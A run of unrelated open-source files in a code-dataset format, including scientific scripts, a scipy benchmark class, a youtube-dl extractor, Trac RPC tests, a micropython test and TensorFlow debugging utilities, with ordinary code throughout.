return datetime.datetime.strptime(self._cur_snapshot, Archive._TIME_FMT)
def ListSnapshots(self):
"""Returns a list of timestamps (datetime.datetime instances)."""
file_names = sorted(
[name[:-(len(Archive._SNAP_EXT))] for name in os.listdir(self._path)
if name.endswith(Archive._SNAP_EXT)])
timestamps = [datetime.datetime.strptime(x, Archive._TIME_FMT)
for x in file_names]
return timestamps
def StoreMemMaps(self, mmaps):
assert(isinstance(mmaps, memory_map.Map))
assert(self._cur_snapshot), 'Must call StartNewSnapshot first'
file_path = os.path.join(self._path, self._cur_snapshot + Archive._MMAP_EXT)
with open(file_path, 'w') as f:
json.dump(mmaps, f, cls=serialization.Encoder)
def HasMemMaps(self, timestamp):
return self._HasSnapshotFile(timestamp, Archive._MMAP_EXT)
def LoadMemMaps(self, timestamp):
assert(self.HasMemMaps(timestamp))
snapshot_name = Archive._TimestampToStr(timestamp)
file_path = os.path.join(self._path, snapshot_name + Archive._MMAP_EXT)
with open(file_path) as f:
return json.load(f, cls=serialization.MmapDecoder)
def StoreNativeHeap(self, nheap):
assert(isinstance(nheap, native_heap.NativeHeap))
assert(self._cur_snapshot), 'Must call StartNewSnapshot first'
file_path = os.path.join(self._path,
self._cur_snapshot + Archive._NHEAP_EXT)
with open(file_path, 'w') as f:
json.dump(nheap, f, cls=serialization.Encoder)
def HasNativeHeap(self, timestamp):
return self._HasSnapshotFile(timestamp, Archive._NHEAP_EXT)
def LoadNativeHeap(self, timestamp):
assert(self.HasNativeHeap(timestamp))
snapshot_name = Archive._TimestampToStr(timestamp)
file_path = os.path.join(self._path, snapshot_name + Archive._NHEAP_EXT)
with open(file_path) as f:
return json.load(f, cls=serialization.NativeHeapDecoder)
def _HasSnapshotFile(self, timestamp, ext):
name = Archive._TimestampToStr(timestamp)
return os.path.exists(os.path.join(self._path, name + ext))
@staticmethod
def _TimestampToStr(timestamp):
return timestamp.strftime(Archive._TIME_FMT) | bsd-3-clause |
Adamtaranto/Corset-tools | crossClustCount.py | 1 | 6705 | #!/usr/bin/env python
#python 2.7.5 requires biopython
#crossClustCount.py
#Version 1. Adam Taranto, April 2015
#Contact, Adam Taranto, adam.taranto@anu.edu.au
#Take two transcriptomes and a Corset cluster map.
#Determine number of member transcripts in each cluster that belong to each of the input transcriptomes.
import os
import csv
import sys
import argparse
from Bio import SeqIO
from Bio.Seq import Seq
from os.path import basename
def main(transFastaX=None, transFastaY=None, transNameX=None, transNameY=None, clustMap=None, outFile='CountClusterMembers.txt'):
#If main is imported to python term as function, check that required inputs are provided
if transFastaX is None:
sys.exit('Missing transcriptome fasta X')
if transFastaY is None:
sys.exit('Missing transcriptome fasta Y')
if clustMap is None:
sys.exit('No cluster mapping file provided')
    #Default the set names to the input fasta basenames if none are supplied
if transNameX is None:
transNameX = basename(os.path.splitext(transFastaX)[0])
if transNameY is None:
transNameY = basename(os.path.splitext(transFastaY)[0])
#Returns dict keyed by transcript name, mapping transcriptome set names
transSets = tranDict(transFastaX, transFastaY, transNameX, transNameY)
#Returns dict keyed by cluster name, with first level dict 'Seq' containing a list of transcripts belonging to cluster.
#clustMem[clustID]['Seqs']
clustMem = mapDict(clustMap)
#Appends sub-dictionaries to clust mem to store member counts for each transcriptome input file
clustMemCounts = memStats(clustMem, transSets, transNameX, transNameY)
#Returns dict with summary of clusters containing zero members from one or more of the reference transcriptomes
summaryDict = summaryStats(clustMemCounts)
#Write output file for cluster counts from each transcriptome
summaryFile = open(outFile,'w')
header = "\t".join(['clusterID', transNameX, transNameY, 'Total_Members'])
summaryFile.write(header + "\n")
for cluster in clustMemCounts.iterkeys():
#print 'this is the cluster: '
#print clustMemCounts[cluster]
#print 'x count =' + str(clustMemCounts[cluster]['countX'])
#print 'y count =' + str(clustMemCounts[cluster]['countY'])
summaryString = "\t".join([cluster, str(clustMemCounts[cluster]['countX']), str(clustMemCounts[cluster]['countY']), str(clustMemCounts[cluster]['countT'])])
#print 'writing summary string:'
#print summaryString + "\n"
summaryFile.write(summaryString + "\n")
summaryFile.close()
#Print summary stats to screen
print "\n" + 'Summary stats:'
print 'Clusters with 0 members from ' + transNameX + ': ' + str(summaryDict['zeroSetX'])
print 'Clusters with 0 members from ' + transNameY + ': ' + str(summaryDict['zeroSetY'])
print 'Clusters with 0 members from either ' + transNameX + ' or ' + transNameY + ': ' + str(summaryDict['zeroBoth'])
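#Example of the tab-separated output file written by main() (illustrative
#values; the second and third column headers are the transcriptome set names):
#
#   clusterID       setX    setY    Total_Members
#   Cluster-0.0     3       1       4
#   Cluster-1.0     0       2       2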
def tranDict(transFastaX, transFastaY, transNameX, transNameY):
#Create dictionary keyed by transcript name, mapping transcripts to their host transcriptome
#Create empty dictionary
transSets={}
#Read transcript names in as keys, add set name as value.
for seq_record in SeqIO.parse(transFastaX, "fasta"):
#Check if transcript name/key is unique
if seq_record.id not in transSets:
transSets[seq_record.id]=str(transNameX)
        #If the transcript name already exists, exit with an error
else:
sys.exit('Duplicate transcript name: ' + seq_record.id + ' in ' + transNameX)
for seq_record in SeqIO.parse(transFastaY, "fasta"):
if seq_record.id not in transSets:
transSets[seq_record.id]=str(transNameY)
else:
sys.exit('Duplicate transcript name: ' + seq_record.id + ' in ' + transNameY)
#print "This in the transcript to set dict:"
#print transSets
return transSets
def mapDict(clustMap):
#Read transcript-to-cluster mapping file into dict object.
#Sample data row:
#TranscriptID ClusterID
#nnt3Ldvymb Cluster-0.0
mapFile = open(clustMap, 'rt')
readMap = csv.reader(mapFile,delimiter='\t')
clustMem={}
#Write records for seqs in name file to new fasta
for row in readMap:
transID=row[0]
clustID=row[1]
#print 'reading transid'
#print row[0]
#print 'reading clustid'
#print row[1]
if clustID not in clustMem:
clustMem[clustID] = {}
clustMem[clustID]['Seqs'] = list()
clustMem[clustID]['Seqs'].append(transID)
mapFile.close()
#print 'clustmem dict, no counts'
#print clustMem
return clustMem
def memStats(clustMem, transSets, transNameX, transNameY):
for clustID in clustMem:
#For each cluster check each transcripts parent set.
clustMem[clustID]['countT'] = int()
clustMem[clustID]['countX'] = int()
clustMem[clustID]['countY'] = int()
for transID in clustMem[clustID]['Seqs']:
clustMem[clustID]['countT'] += 1
if transID not in transSets:
print 'No set name found for transcript: ' + transID
else:
if transSets[transID] == transNameX:
clustMem[clustID]['countX'] += 1
#
if transSets[transID] == transNameY:
clustMem[clustID]['countY'] += 1
clustMemCounts = clustMem
return clustMemCounts
def summaryStats(clustMemCounts):
summary = {}
summary['zeroSetX'] = int(0)
summary['zeroSetY'] = int(0)
summary['zeroBoth'] = int(0)
for cluster in clustMemCounts:
if clustMemCounts[cluster]['countX'] == 0:
summary['zeroSetX'] += 1
if clustMemCounts[cluster]['countY'] == 0:
summary['zeroSetY'] += 1
if clustMemCounts[cluster]['countX'] == 0 and clustMemCounts[cluster]['countY'] == 0:
summary['zeroBoth'] += 1
return summary
if __name__== '__main__':
###Argument handling.
    arg_parser = argparse.ArgumentParser(description='For Corset clusters generated from two transcriptomes, this program reports the number of transcripts from each transcriptome that are members of each cluster.')
arg_parser.add_argument("-X","--transFastaX", required=True, help="Fasta file for transcriptome X")
arg_parser.add_argument("-Y","--transFastaY", required=True, help="Fasta file for transcriptome Y")
arg_parser.add_argument("-x","--transNameX", help="Unique lable for transcriptome X")
arg_parser.add_argument("-y","--transNameY", help="Unique lable for transcriptome Y")
arg_parser.add_argument("-o","--outFile", default='CountClusterMembers.txt', help="Location for summary file to be written to.")
arg_parser.add_argument("-c","--clustMap", required=True, help="Corset transcript-to-cluster mapping file.")
args = arg_parser.parse_args()
###Variable Definitions
transFastaX=args.transFastaX
transFastaY=args.transFastaY
transNameX=args.transNameX
transNameY=args.transNameY
outFile=args.outFile
clustMap=args.clustMap
main(transFastaX, transFastaY, transNameX, transNameY, clustMap, outFile) | gpl-2.0 |
tudorvio/tempest | tempest/api_schema/response/compute/v2_1/flavors_access.py | 38 | 1305 | # Copyright 2014 NEC Corporation. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
add_remove_list_flavor_access = {
'status_code': [200],
'response_body': {
'type': 'object',
'properties': {
'flavor_access': {
'type': 'array',
'items': {
'type': 'object',
'properties': {
'flavor_id': {'type': 'string'},
'tenant_id': {'type': 'string'},
},
'additionalProperties': False,
'required': ['flavor_id', 'tenant_id'],
}
}
},
'additionalProperties': False,
'required': ['flavor_access']
}
}
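# A response body matching the schema above would look like (illustrative
# values):
#
#   {
#       "flavor_access": [
#           {"flavor_id": "10",
#            "tenant_id": "6f70656e737461636b20342065766572"}
#       ]
#   }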
| apache-2.0 |
pbrod/scipy | benchmarks/benchmarks/go_benchmark_functions/go_benchmark.py | 36 | 6173 | # -*- coding: utf-8 -*-
from __future__ import division, print_function, absolute_import
import numpy as np
from numpy import (abs, arctan2, asarray, cos, exp, floor, log, log10,
arange, pi, prod, roll, seterr, sign, sin, sqrt, sum, where,
zeros, tan, tanh, dot)
try:
from scipy.special import factorial
except ImportError:
pass
class Benchmark(object):
"""
Defines a global optimization benchmark problem.
This abstract class defines the basic structure of a global
optimization problem. Subclasses should implement the ``fun`` method
for a particular optimization problem.
Attributes
----------
N : int
The dimensionality of the problem.
bounds : sequence
The lower/upper bounds to be used for minimizing the problem.
This a list of (lower, upper) tuples that contain the lower and upper
bounds for the problem. The problem should not be asked for evaluation
outside these bounds. ``len(bounds) == N``.
xmin : sequence
The lower bounds for the problem
xmax : sequence
The upper bounds for the problem
fglob : float
The global minimum of the evaluated function.
global_optimum : sequence
A list of vectors that provide the locations of the global minimum.
Note that some problems have multiple global minima, not all of which
may be listed.
nfev : int
the number of function evaluations that the object has been asked to
calculate.
change_dimensionality : bool
Whether we can change the benchmark function `x` variable length (i.e.,
the dimensionality of the problem)
custom_bounds : sequence
a list of tuples that contain lower/upper bounds for use in plotting.
"""
def __init__(self, dimensions):
"""
Initialises the problem
Parameters
----------
dimensions : int
The dimensionality of the problem
"""
self._dimensions = dimensions
self.nfev = 0
self.fglob = np.nan
self.global_optimum = None
self.change_dimensionality = False
self.custom_bounds = None
def __str__(self):
return '{0} ({1} dimensions)'.format(self.__class__.__name__, self.N)
def __repr__(self):
return self.__class__.__name__
def initial_vector(self):
"""
Random initialisation for the benchmark problem.
Returns
-------
x : sequence
a vector of length ``N`` that contains random floating point
numbers that lie between the lower and upper bounds for a given
parameter.
"""
return asarray([np.random.uniform(l, u) for l, u in self.bounds])
def success(self, x, tol=1.e-5):
"""
        Tests if a candidate solution is at the global minimum.
        The default test is that the function value at ``x`` differs from
        the known global minimum ``fglob`` by less than ``tol``.
Parameters
----------
x : sequence
The candidate vector for testing if the global minimum has been
reached. Must have ``len(x) == self.N``
tol : float
The evaluated function and known global minimum must differ by less
than this amount to be at a global minimum.
Returns
-------
bool : is the candidate vector at the global minimum?
"""
val = self.fun(asarray(x))
if abs(val - self.fglob) < tol:
return True
# the solution should still be in bounds, otherwise immediate fail.
if np.any(x > np.asfarray(self.bounds)[:, 1]):
return False
if np.any(x < np.asfarray(self.bounds)[:, 0]):
return False
# you found a lower global minimum. This shouldn't happen.
if val < self.fglob:
raise ValueError("Found a lower global minimum",
x,
val,
self.fglob)
return False
def fun(self, x):
"""
Evaluation of the benchmark function.
Parameters
----------
x : sequence
The candidate vector for evaluating the benchmark problem. Must
have ``len(x) == self.N``.
Returns
-------
val : float
the evaluated benchmark function
"""
raise NotImplementedError
def change_dimensions(self, ndim):
"""
Changes the dimensionality of the benchmark problem
The dimensionality will only be changed if the problem is suitable
Parameters
----------
ndim : int
The new dimensionality for the problem.
"""
if self.change_dimensionality:
self._dimensions = ndim
else:
            raise ValueError('dimensionality cannot be changed for this '
                             'problem')
@property
def bounds(self):
"""
The lower/upper bounds to be used for minimizing the problem.
This a list of (lower, upper) tuples that contain the lower and upper
bounds for the problem. The problem should not be asked for evaluation
outside these bounds. ``len(bounds) == N``.
"""
if self.change_dimensionality:
return [self._bounds[0]] * self.N
else:
return self._bounds
@property
def N(self):
"""
The dimensionality of the problem.
Returns
-------
N : int
The dimensionality of the problem
"""
return self._dimensions
@property
def xmin(self):
"""
The lower bounds for the problem
Returns
-------
xmin : sequence
The lower bounds for the problem
"""
return asarray([b[0] for b in self.bounds])
@property
def xmax(self):
"""
The upper bounds for the problem
Returns
-------
xmax : sequence
The upper bounds for the problem
"""
return asarray([b[1] for b in self.bounds])
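# A minimal concrete subclass as an illustrative example (not part of the
# benchmark suite): the sphere function f(x) = sum(x_i ** 2), whose global
# minimum is 0.0 at the origin.
class _ExampleSphere(Benchmark):
    def __init__(self, dimensions=2):
        Benchmark.__init__(self, dimensions)
        # (lower, upper) bounds for each of the N coordinates
        self._bounds = list(zip([-5.0] * self.N, [5.0] * self.N))
        self.global_optimum = [[0.0] * self.N]
        self.fglob = 0.0
        self.change_dimensionality = True

    def fun(self, x):
        # count every evaluation, as the real benchmarks do
        self.nfev += 1
        return sum(x ** 2.0)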
| bsd-3-clause |
gtko/CouchPotatoServer | couchpotato/core/media/movie/providers/trailer/youtube_dl/extractor/ninegag.py | 2 | 2542 | from __future__ import unicode_literals
import re
import json
from .common import InfoExtractor
from ..utils import str_to_int
class NineGagIE(InfoExtractor):
IE_NAME = '9gag'
_VALID_URL = r'''(?x)^https?://(?:www\.)?9gag\.tv/
(?:
v/(?P<numid>[0-9]+)|
p/(?P<id>[a-zA-Z0-9]+)/(?P<display_id>[^?#/]+)
)
'''
_TESTS = [{
"url": "http://9gag.tv/v/1912",
"info_dict": {
"id": "1912",
"ext": "mp4",
"description": "This 3-minute video will make you smile and then make you feel untalented and insignificant. Anyway, you should share this awesomeness. (Thanks, Dino!)",
"title": "\"People Are Awesome 2013\" Is Absolutely Awesome",
"view_count": int,
"thumbnail": "re:^https?://",
},
'add_ie': ['Youtube']
},
{
'url': 'http://9gag.tv/p/KklwM/alternate-banned-opening-scene-of-gravity?ref=fsidebar',
'info_dict': {
'id': 'KklwM',
'ext': 'mp4',
'display_id': 'alternate-banned-opening-scene-of-gravity',
"description": "While Gravity was a pretty awesome movie already, YouTuber Krishna Shenoi came up with a way to improve upon it, introducing a much better solution to Sandra Bullock's seemingly endless tumble in space. The ending is priceless.",
'title': "Banned Opening Scene Of \"Gravity\" That Changes The Whole Movie",
},
}]
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
video_id = mobj.group('numid') or mobj.group('id')
display_id = mobj.group('display_id') or video_id
webpage = self._download_webpage(url, display_id)
post_view = json.loads(self._html_search_regex(
r'var postView = new app\.PostView\({\s*post:\s*({.+?}),', webpage, 'post view'))
youtube_id = post_view['videoExternalId']
title = post_view['title']
description = post_view['description']
view_count = str_to_int(post_view['externalView'])
thumbnail = post_view.get('thumbnail_700w') or post_view.get('ogImageUrl') or post_view.get('thumbnail_300w')
return {
'_type': 'url_transparent',
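            # 'url_transparent' delegates the actual extraction to the
            # Youtube IE named below, while keeping the metadata scraped
            # from the 9gag page (title, description, view count, ...).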
'url': youtube_id,
'ie_key': 'Youtube',
'id': video_id,
'display_id': display_id,
'title': title,
'description': description,
'view_count': view_count,
'thumbnail': thumbnail,
}
| gpl-3.0 |
Puppet-Finland/trac | files/xmlrpcplugin/trunk/tracrpc/tests/api.py | 1 | 5895 | # -*- coding: utf-8 -*-
"""
License: BSD
(c) 2009 ::: www.CodeResort.com - BV Network AS (simon-code@bvnetwork.no)
"""
import os
import unittest
import urllib2
from tracrpc.tests import rpc_testenv, TracRpcTestCase
from tracrpc.api import IRPCProtocol
from trac.core import *
from trac.test import Mock
class ProtocolProviderTestCase(TracRpcTestCase):
def setUp(self):
TracRpcTestCase.setUp(self)
def tearDown(self):
TracRpcTestCase.tearDown(self)
def test_invalid_content_type(self):
req = urllib2.Request(rpc_testenv.url_anon,
headers={'Content-Type': 'text/plain'},
data='Fail! No RPC for text/plain')
try:
resp = urllib2.urlopen(req)
self.fail("Expected urllib2.HTTPError")
except urllib2.HTTPError, e:
self.assertEquals(e.code, 415)
self.assertEquals(e.msg, "Unsupported Media Type")
self.assertEquals(e.fp.read(),
"No protocol matching Content-Type 'text/plain' at path '/rpc'.")
def test_rpc_info(self):
# Just try getting the docs for XML-RPC to test, it should always exist
from tracrpc.xml_rpc import XmlRpcProtocol
xmlrpc = XmlRpcProtocol(rpc_testenv.get_trac_environment())
name, docs = xmlrpc.rpc_info()
self.assertEquals(name, 'XML-RPC')
self.assertTrue('Content-Type: application/xml' in docs)
def test_valid_provider(self):
# Confirm the request won't work before adding plugin
req = urllib2.Request(rpc_testenv.url_anon,
headers={'Content-Type': 'application/x-tracrpc-test'},
data="Fail! No RPC for application/x-tracrpc-test")
try:
resp = urllib2.urlopen(req)
self.fail("Expected urllib2.HTTPError")
except urllib2.HTTPError, e:
self.assertEquals(e.code, 415)
# Make a new plugin
provider = os.path.join(rpc_testenv.tracdir, 'plugins', 'DummyProvider.py')
open(provider, 'w').write(
"from trac.core import *\n"
"from tracrpc.api import *\n"
"class DummyProvider(Component):\n"
" implements(IRPCProtocol)\n"
" def rpc_info(self):\n"
" return ('TEST-RPC', 'No Docs!')\n"
" def rpc_match(self):\n"
" yield ('rpc', 'application/x-tracrpc-test')\n"
" def parse_rpc_request(self, req, content_type):\n"
" return {'method' : 'system.getAPIVersion'}\n"
" def send_rpc_error(self, req, e):\n"
" rpcreq = req.rpc\n"
" req.send_error(None, template='', content_type=rpcreq['mimetype'],\n"
" status=500, env=None, data='Test failure ')\n"
" def send_rpc_result(self, req, result):\n"
" rpcreq = req.rpc\n"
" # raise KeyError('Here')\n"
" response = 'Got a result!'\n"
" req.send(response, rpcreq['mimetype'], 200)\n")
rpc_testenv.restart()
try:
req = urllib2.Request(rpc_testenv.url_anon,
headers={'Content-Type': 'application/x-tracrpc-test'})
resp = urllib2.urlopen(req)
self.assertEquals(200, resp.code)
self.assertEquals("Got a result!", resp.read())
self.assertEquals(resp.headers['Content-Type'],
'application/x-tracrpc-test;charset=utf-8')
finally:
# Clean up so that provider don't affect further tests
os.unlink(provider)
rpc_testenv.restart()
def test_general_provider_error(self):
# Make a new plugin and restart server
provider = os.path.join(rpc_testenv.tracdir, 'plugins', 'DummyProvider.py')
open(provider, 'w').write(
"from trac.core import *\n"
"from tracrpc.api import *\n"
"class DummyProvider(Component):\n"
" implements(IRPCProtocol)\n"
" def rpc_info(self):\n"
" return ('TEST-RPC', 'No Docs!')\n"
" def rpc_match(self):\n"
" yield ('rpc', 'application/x-tracrpc-test')\n"
" def parse_rpc_request(self, req, content_type):\n"
" return {'method' : 'system.getAPIVersion'}\n"
" def send_rpc_error(self, req, e):\n"
" if isinstance(e, RPCError) :\n"
" req.send_error(None, template='', \n"
" content_type='text/plain',\n"
" status=500, env=None, data=e.message)\n"
" else :\n"
" req.send_error(None, template='', \n"
" content_type='text/plain',\n"
" status=500, env=None, data='Test failure')\n"
" def send_rpc_result(self, req, result):\n"
" raise RPCError('No good.')")
rpc_testenv.restart()
# Make the request
try:
req = urllib2.Request(rpc_testenv.url_anon,
headers={'Content-Type': 'application/x-tracrpc-test'})
resp = urllib2.urlopen(req)
except urllib2.HTTPError, e:
self.assertEquals(500, e.code)
self.assertEquals("No good.", e.fp.read())
self.assertTrue(e.hdrs['Content-Type'].startswith('text/plain'))
finally:
# Clean up so that provider don't affect further tests
os.unlink(provider)
rpc_testenv.restart()
def test_suite():
return unittest.makeSuite(ProtocolProviderTestCase)
if __name__ == '__main__':
unittest.main(defaultTest='test_suite')
| bsd-2-clause |
Timmenem/micropython | tests/basics/gen_yield_from_ducktype.py | 107 | 1034 | class MyGen:
def __init__(self):
self.v = 0
def __iter__(self):
return self
def __next__(self):
self.v += 1
if self.v > 5:
raise StopIteration
return self.v
def gen():
yield from MyGen()
def gen2():
yield from gen()
print(list(gen()))
print(list(gen2()))
class Incrementer:
def __iter__(self):
return self
def __next__(self):
return self.send(None)
def send(self, val):
if val is None:
return "Incrementer initialized"
return val + 1
def gen3():
yield from Incrementer()
g = gen3()
print(next(g))
print(g.send(5))
print(g.send(100))
#
# Test proper handling of StopIteration vs other exceptions
#
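# A duck-typed generator must let a StopIteration raised by its
# __next__/send terminate only the yield-from expression -- its value (42
# here) becomes the result assigned to ret -- while any other exception,
# like the ZeroDivisionError raised right after, propagates out normally.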
class MyIter:
def __iter__(self):
return self
def __next__(self):
raise StopIteration(42)
def gen4():
global ret
ret = yield from MyIter()
1//0
ret = None
try:
print(list(gen4()))
except ZeroDivisionError:
print("ZeroDivisionError")
print(ret)
| mit |
chemelnucfin/tensorflow | tensorflow/python/util/decorator_utils.py | 32 | 4132 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Utility functions for writing decorators (which modify docstrings)."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import sys
def get_qualified_name(function):
# Python 3
if hasattr(function, '__qualname__'):
return function.__qualname__
# Python 2
if hasattr(function, 'im_class'):
return function.im_class.__name__ + '.' + function.__name__
return function.__name__
def _normalize_docstring(docstring):
"""Normalizes the docstring.
Replaces tabs with spaces, removes leading and trailing blanks lines, and
removes any indentation.
Copied from PEP-257:
https://www.python.org/dev/peps/pep-0257/#handling-docstring-indentation
Args:
docstring: the docstring to normalize
Returns:
The normalized docstring
"""
if not docstring:
return ''
# Convert tabs to spaces (following the normal Python rules)
# and split into a list of lines:
lines = docstring.expandtabs().splitlines()
# Determine minimum indentation (first line doesn't count):
# (we use sys.maxsize because sys.maxint doesn't exist in Python 3)
indent = sys.maxsize
for line in lines[1:]:
stripped = line.lstrip()
if stripped:
indent = min(indent, len(line) - len(stripped))
# Remove indentation (first line is special):
trimmed = [lines[0].strip()]
if indent < sys.maxsize:
for line in lines[1:]:
trimmed.append(line[indent:].rstrip())
# Strip off trailing and leading blank lines:
while trimmed and not trimmed[-1]:
trimmed.pop()
while trimmed and not trimmed[0]:
trimmed.pop(0)
# Return a single string:
return '\n'.join(trimmed)
def add_notice_to_docstring(
doc, instructions, no_doc_str, suffix_str, notice):
"""Adds a deprecation notice to a docstring.
Args:
doc: The original docstring.
instructions: A string, describing how to fix the problem.
no_doc_str: The default value to use for `doc` if `doc` is empty.
suffix_str: Is added to the end of the first line.
notice: A list of strings. The main notice warning body.
Returns:
A new docstring, with the notice attached.
Raises:
ValueError: If `notice` is empty.
"""
if not doc:
lines = [no_doc_str]
else:
lines = _normalize_docstring(doc).splitlines()
lines[0] += ' ' + suffix_str
if not notice:
raise ValueError('The `notice` arg must not be empty.')
notice[0] = 'Warning: ' + notice[0]
notice = [''] + notice + ([instructions] if instructions else [])
if len(lines) > 1:
# Make sure that we keep our distance from the main body
if lines[1].strip():
notice.append('')
lines[1:1] = notice
else:
lines += notice
return '\n'.join(lines)
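# Illustrative example (not part of the original module):
#
#   add_notice_to_docstring(
#       doc='Does a thing.',
#       instructions='Use new_thing instead.',
#       no_doc_str='DEPRECATED FUNCTION',
#       suffix_str='(deprecated)',
#       notice=['THIS FUNCTION IS DEPRECATED.'])
#
# returns:
#
#   Does a thing. (deprecated)
#
#   Warning: THIS FUNCTION IS DEPRECATED.
#   Use new_thing instead.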
def validate_callable(func, decorator_name):
if not hasattr(func, '__call__'):
raise ValueError(
'%s is not a function. If this is a property, make sure'
' @property appears before @%s in your source code:'
'\n\n@property\n@%s\ndef method(...)' % (
func, decorator_name, decorator_name))
class classproperty(object): # pylint: disable=invalid-name
"""Class property decorator.
Example usage:
class MyClass(object):
@classproperty
def value(cls):
return '123'
> print MyClass.value
123
"""
def __init__(self, func):
self._func = func
def __get__(self, owner_self, owner_cls):
return self._func(owner_cls)
| apache-2.0 |
scenarios/tensorflow | tensorflow/python/debug/examples/debug_tflearn_iris.py | 23 | 6482 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Debug the tf-learn iris example, based on the tf-learn tutorial."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import os
import sys
import tempfile
import numpy as np
from six.moves import urllib
import tensorflow as tf
from tensorflow.contrib.learn.python.learn import experiment
from tensorflow.contrib.learn.python.learn.datasets import base
from tensorflow.python import debug as tf_debug
# URLs to download data sets from, if necessary.
IRIS_TRAINING_DATA_URL = "https://raw.githubusercontent.com/tensorflow/tensorflow/master/tensorflow/examples/tutorials/monitors/iris_training.csv"
IRIS_TEST_DATA_URL = "https://raw.githubusercontent.com/tensorflow/tensorflow/master/tensorflow/examples/tutorials/monitors/iris_test.csv"
def maybe_download_data(data_dir):
"""Download data sets if necessary.
Args:
data_dir: Path to where data should be downloaded.
Returns:
Paths to the training and test data files.
"""
if not os.path.isdir(data_dir):
os.makedirs(data_dir)
training_data_path = os.path.join(data_dir,
os.path.basename(IRIS_TRAINING_DATA_URL))
if not os.path.isfile(training_data_path):
train_file = open(training_data_path, "wt")
urllib.request.urlretrieve(IRIS_TRAINING_DATA_URL, train_file.name)
train_file.close()
print("Training data are downloaded to %s" % train_file.name)
test_data_path = os.path.join(data_dir, os.path.basename(IRIS_TEST_DATA_URL))
if not os.path.isfile(test_data_path):
test_file = open(test_data_path, "wt")
urllib.request.urlretrieve(IRIS_TEST_DATA_URL, test_file.name)
test_file.close()
print("Test data are downloaded to %s" % test_file.name)
return training_data_path, test_data_path
_IRIS_INPUT_DIM = 4
def iris_input_fn():
iris = base.load_iris()
features = tf.reshape(tf.constant(iris.data), [-1, _IRIS_INPUT_DIM])
labels = tf.reshape(tf.constant(iris.target), [-1])
return features, labels
def main(_):
# Load datasets.
if FLAGS.fake_data:
training_set = tf.contrib.learn.datasets.base.Dataset(
np.random.random([120, 4]),
np.random.random_integers(3, size=[120]) - 1)
test_set = tf.contrib.learn.datasets.base.Dataset(
np.random.random([30, 4]),
np.random.random_integers(3, size=[30]) - 1)
else:
training_data_path, test_data_path = maybe_download_data(FLAGS.data_dir)
training_set = tf.contrib.learn.datasets.base.load_csv_with_header(
filename=training_data_path,
target_dtype=np.int,
features_dtype=np.float32)
test_set = tf.contrib.learn.datasets.base.load_csv_with_header(
filename=test_data_path, target_dtype=np.int, features_dtype=np.float32)
# Specify that all features have real-value data
feature_columns = [tf.contrib.layers.real_valued_column("", dimension=4)]
# Build 3 layer DNN with 10, 20, 10 units respectively.
model_dir = FLAGS.model_dir or tempfile.mkdtemp(prefix="debug_tflearn_iris_")
classifier = tf.contrib.learn.DNNClassifier(
feature_columns=feature_columns,
hidden_units=[10, 20, 10],
n_classes=3,
model_dir=model_dir)
hooks = None
if FLAGS.debug:
debug_hook = tf_debug.LocalCLIDebugHook(ui_type=FLAGS.ui_type)
debug_hook.add_tensor_filter("has_inf_or_nan", tf_debug.has_inf_or_nan)
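    # With this filter registered, the tfdbg CLI command
    # `run -f has_inf_or_nan` keeps re-running the graph until an
    # execution produces a tensor containing an inf or nan value.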
hooks = [debug_hook]
if not FLAGS.use_experiment:
# Fit model.
classifier.fit(x=training_set.data,
y=training_set.target,
steps=FLAGS.train_steps,
monitors=hooks)
# Evaluate accuracy.
accuracy_score = classifier.evaluate(x=test_set.data,
y=test_set.target,
hooks=hooks)["accuracy"]
else:
ex = experiment.Experiment(classifier,
train_input_fn=iris_input_fn,
eval_input_fn=iris_input_fn,
train_steps=FLAGS.train_steps,
eval_delay_secs=0,
eval_steps=1,
train_monitors=hooks,
eval_hooks=hooks)
ex.train()
accuracy_score = ex.evaluate()["accuracy"]
print("After training %d steps, Accuracy = %f" %
(FLAGS.train_steps, accuracy_score))
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.register("type", "bool", lambda v: v.lower() == "true")
parser.add_argument(
"--data_dir",
type=str,
default="/tmp/iris_data",
help="Directory to save the training and test data in.")
parser.add_argument(
"--model_dir",
type=str,
default="",
help="Directory to save the trained model in.")
parser.add_argument(
"--train_steps",
type=int,
default=10,
help="Number of steps to run trainer.")
parser.add_argument(
"--use_experiment",
type="bool",
nargs="?",
const=True,
default=False,
help="Use tf.contrib.learn Experiment to run training and evaluation")
parser.add_argument(
"--ui_type",
type=str,
default="curses",
help="Command-line user interface type (curses | readline)")
parser.add_argument(
"--fake_data",
type="bool",
nargs="?",
const=True,
default=False,
help="Use fake MNIST data for unit testing")
parser.add_argument(
"--debug",
type="bool",
nargs="?",
const=True,
default=False,
help="Use debugger to track down bad values during training")
FLAGS, unparsed = parser.parse_known_args()
tf.app.run(main=main, argv=[sys.argv[0]] + unparsed)
| apache-2.0 |
JakeBrand/CMPUT410-E6 | v1/lib/python2.7/site-packages/django/forms/formsets.py | 49 | 17531 | from __future__ import unicode_literals
from django.core.exceptions import ValidationError
from django.forms import Form
from django.forms.fields import IntegerField, BooleanField
from django.forms.utils import ErrorList
from django.forms.widgets import HiddenInput
from django.utils.encoding import python_2_unicode_compatible
from django.utils.functional import cached_property
